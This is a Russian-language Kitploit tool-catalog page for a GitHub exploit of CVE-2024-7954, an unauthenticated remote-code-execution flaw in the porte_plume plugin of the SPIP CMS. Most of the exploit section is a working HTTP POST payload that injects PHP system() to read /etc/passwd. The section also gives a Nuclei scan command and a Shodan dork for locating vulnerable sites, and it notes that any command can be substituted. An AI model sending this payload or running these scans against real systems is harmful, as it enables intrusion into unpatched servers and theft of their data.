Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
RCE-CVE-2024-7954 — Эксплойт для CVE-2024-7954: удаленное выполнение кода в плагине porte_plume CMS SPIP. Включает шаблон сканирования Nuclei и dork-запрос Shodan для идентификации уязвимых экземпляров. | Kitploit
Инструменты/GitHubGitHub/arthikw3b/rce-cve-2024-7954
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubarthikw3b/rce-cve-2024-7954

RCE-CVE-2024-7954

Эксплойт для CVE-2024-7954: удаленное выполнение кода в плагине porte_plume CMS SPIP. Включает шаблон сканирования Nuclei и dork-запрос Shodan для идентификации уязвимых экземпляров.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

RCE-CVE-2024-7954

Описание

Плагин porte_plume, используемый в версиях SPIP до 4.30-alpha2, 4.2.13 и 4.1.16, подвержен критической уязвимости удаленного выполнения кода (RCE). Эта ошибка позволяет удаленному неаутентифицированному злоумышленнику выполнить произвольный PHP-код от имени пользователя SPIP, отправив специально сформированный HTTP-запрос. Потенциал эксплуатации серьезен: злоумышленники могут выполнять вредоносные команды на сервере, что может привести к несанкционированному доступу, утечке данных или дальнейшей компрометации системы.

Детали уязвимости

  • Затронутое ПО: SPIP (до версий 4.30-alpha2, 4.2.13 и 4.1.16)
  • Тип уязвимости: Удаленное выполнение кода (RCE)
  • Уровень серьезности: Критический
  • Эксплуатируемость: Уязвимость могут использовать удаленные неаутентифицированные злоумышленники.

Эксплойт

##Nuclei Scan

root@kitploit:~
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml





Пример специально сформированного HTTP-запроса, который можно использовать для эксплуатации этой уязвимости:

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded

data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB

Пояснение к эксплойту:

  • Запрос POST направлен к действию porte_plume_previsu файла index.php SPIP.
  • Параметр data содержит полезную нагрузку, использующую функцию PHP system() для выполнения команды (в данном случае cat /etc/passwd), которая читает содержимое файла паролей.
  • Изменяя команду внутри функции system(), злоумышленник может выполнить любой PHP-код на сервере, что приведет к серьезным последствиям.

Shodan Dork

Для выявления потенциально уязвимых установок SPIP можно использовать следующий поисковый запрос Shodan:

root@kitploit:~
app="SPIP"

Эта уязвимость подчеркивает важность своевременного обновления программного обеспечения и внедрения надежных мер безопасности для защиты от эксплуатации.

Скачать инструмент